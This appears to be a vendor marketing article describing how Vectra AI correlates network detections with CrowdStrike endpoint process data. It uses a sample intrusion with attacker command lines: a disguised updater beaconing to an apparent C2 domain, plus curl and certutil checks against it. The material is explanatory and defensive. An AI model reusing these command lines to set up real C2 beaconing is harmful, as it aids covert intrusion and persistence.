How Vectra AI Connects Network Detections to Endpoint Processes Automatically

Stop hunting for the "what" — see it instantly

When suspicious activity appears, the first question every analyst asks is: What caused this?

Without the answer, investigations stall. Analysts pivot between consoles, search through endpoint telemetry, correlate timestamps, and piece together context manually. Minutes turn into hours. Meanwhile, attackers move laterally, exfiltrate data, or establish persistence.

This is the gap between network detection and endpoint understanding — and it's where threats gain their advantage.

The Missing Link Between Network and Endpoint

Network Detection and Response (NDR) excels at spotting suspicious behaviors: command-and-control, reconnaissance, lateral movement, data exfiltration. But network telemetry alone can't tell you which process on the endpoint initiated that behavior.

Was it a legitimate browser session? A PowerShell script? A hidden malware executable?

Endpoint Detection and Response (EDR) captures that process-level detail, but without correlation to network activity, analysts must manually bridge the gap — searching CrowdStrike for processes around the same timeframe, hoping to identify the culprit.

This manual correlation is slow, error-prone, and unsustainable at scale.

Introducing EDR Automatic Process Correlation

Vectra AI's newest capability, EDR Process Correlation, eliminates this investigative friction entirely and enriches contextualisation.

Here's how it works:

When Vectra AI identifies suspicious network behavior, it automatically queries CrowdStrike telemetry for that specific host, analyzes the process activity, and identifies the most probable process that triggered the detection.

The result? Instant, automatic answers.

Analysts see the complete process context directly within the Vectra AI detection:

Probable Process
MicrosoftEdgeUpdate.exe

Process Creation Time
2025-11-29T03:58:42Z

Command Line
"C:\ProgramData\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" --connect vault-tech.org:443 --interval 300 --retry infinite

SHA256
c7e9a4b2f8d6c5e3a1f7d9b4c2e8a6f5d3b1c9e7a5f3d1b8c6e4a2f9d7b5c3e1

File Path
\Device\HarddiskVolume2\ProgramData\Microsoft\EdgeUpdate\

Account Name
NT AUTHORITY\SYSTEM

Parent Process
services.exe (PID: 668)

In seconds, the analyst has the full story: 

• What executed: A disguised persistence mechanism mimicking Microsoft Edge's updater

• When it ran: Exact process creation timestamp for timeline correlation

• What it did: Command line exposes C2 domain (vault-tech.org), 5-minute beacon interval, and infinite retry attempts

• Where it lives: Hidden in a legitimate-looking Microsoft folder path

• Who ran it: SYSTEM account - maximum privileges for persistence and lateral movement

• What spawned it: services.exe indicates this malware registered itself as a Windows service

• Threat intelligence: SHA256 hash ready for immediate reputation checks and threat feed correlation

At first glance, this looks like routine Microsoft software. But the command line tells the real story - it's a persistent C2 beacon with SYSTEM privileges, checking in every 5 minutes, disguised as a legitimate updater.

That command line alone converts "potentially suspicious network traffic" into "confirmed persistent threat requiring immediate containment." That's investigative gold, delivered automatically.

Plus, a one-click pivot to CrowdStrike takes analysts directly to the full process tree and forensic timeline when deeper investigation is needed.

No manual searches. No console switching. No guesswork.

From Hours to Seconds: Real Impact for SOC Teams

Before EDR Process Correlation:

1. Analyst receives Vectra AI network detection

2. Identifies the affected host

3. Opens CrowdStrike console

4. Searches for processes around the detection timeframe

5. Correlates network timestamps with process activity

6. Validates which process is responsible

7. Average time: 15-30 minutes per detection

With EDR Process Correlation:

1. Analyst receives Vectra AI detection with process already identified

2. Reviews enriched context inline

3. Clicks directly into CrowdStrike if deeper investigation needed

4. Average time: 30-60 seconds

That's a 95% reduction in investigation time — and it compounds across every detection, every day.

Beyond Single Processes: From Detection to Enterprise-Wide Hunt

EDR Process Correlation doesn't just identify the probable process - it provides a complete investigation workflow from initial triage to enterprise-wide threat hunting.

Immediate Context: Show More Processes

With one click on Show More Processes, analysts see all process activity during the detection window. In this example, reviewing the process list reveals the full attack progression:

1. msedge.exe - Initial access via phishing click

2. curl.exe - Reconnaissance: curl.exe -I https://vault-tech.org --connect-timeout 5
   The attacker validates C2 reachability before committing to persistence - a HEAD request with connection timeout indicates cautious operational security

3. certutil.exe - SSL validation to verify C2 infrastructure
   Rather than the typical abuse for file downloads, here certutil verifies the C2's certificate chain, ensuring the encrypted tunnel won't trigger SSL warnings or trust errors that might alert users or security tools

4. MicrosoftEdgeUpdate.exe - Persistent C2 tunnel with 5-minute beacons
   Only after confirming infrastructure reachability and SSL validity does the attacker establish the beaconing implant with 5-minute intervals

Deeper Host Investigation: One-Click CrowdStrike Pivot

From the same interface, Investigate Host in CrowdStrike opens directly into the full host timeline within Falcon. Analysts can instantly extend the timeframe to see processes before or after the detection window - no manual host lookups, no AID searches, just immediate access to complete host context.

This is invaluable for understanding the full scope: Was there reconnaissance days earlier? Did the attacker return with different tools? The timeline is right there.

Enterprise-Wide Hunting: Pre-Built Threat Intelligence Query

The real power emerges with Run Query in CrowdStrike, which generates a sophisticated Falcon NGSIEM query pre-populated with all the relevant indicators:

• Remote IP addresses

• SHA256 hashes

• Command line patterns

• Process execution characteristics

• Network connection details

This query would take a very experienced analyst 10-15 minutes to construct manually. Vectra AI delivers it instantly, ready to run across your entire environment.

Example use case: The query is scoped to this host by default, but with one modification - removing the host filter - analysts can immediately hunt for:

• Any other endpoints connecting to vault-tech.org

• Any other systems running the same malicious hash

• Similar command line patterns indicating related campaigns

This transforms a single-host detection into enterprise-wide threat intelligence in seconds.

This is particularly powerful when NDR detects activity that EDR didn't flag. The attacker successfully blended in at the process level, but the network behavior exposed them. EDR Process Correlation bridges that gap instantly, showing not just what happened, but the complete progression of the attack.

See this example in action:

Built for Real-World Investigations

Using intelligent timestamp correlation and probabilistic process matching, Vectra AI EDR Process Correlation handles the complexity of modern endpoints automatically:

• Multi-process environments: Identifies the right process even when dozens are running simultaneously

• Child process chains: Enables tracing activity back through parent-child relationships

• Short-lived processes: Captures context even for processes that execute and terminate quickly

• Encrypted traffic: Correlates network behavior with processes even when payload inspection isn't possible

This intelligence powers faster, more confident decisions across your entire security workflow.

Complete Visibility, Unified Response

EDR Process Correlation is part of Vectra AI's comprehensive integration with CrowdStrike, delivering end-to-end threat clarity:

1. Asset Contextualization — CrowdStrike-managed endpoints are automatically identified in Vectra AI with OS, sensor ID, and last-seen details

2. EDR Process Correlation — Process telemetry is automatically correlated with network detections

3. Automated Response — Vectra AI can trigger host containment actions through CrowdStrike's API

Together, these capabilities create a unified defense that sees the complete attack story — from initial process execution to network propagation — without manual intervention.

Why This Matters Now

Attackers increasingly blend endpoint techniques with network movement to evade detection. Malware dropped on an endpoint doesn't stay there — it beacons to C2 servers, moves laterally, and exfiltrates data across the network.

Your defenses must move just as fluidly.

By automatically connecting endpoint process context to network detections, Vectra AI and CrowdStrike expose the full attack chain instantly. Analysts get complete cross-domain visibility from the first alert — no pivoting, no delay, no blind spots.

See EDR Process Correlation in Action

Watch how Vectra AI automatically identifies the initiating process for network detections and enables one-click investigation in CrowdStrike.

Ready to accelerate your threat investigations?

Learn more about Vectra AI's integration with CrowdStrike and how EDR Process Correlation delivers instant context for faster, more confident response.

[Explore the Integration →]  

‍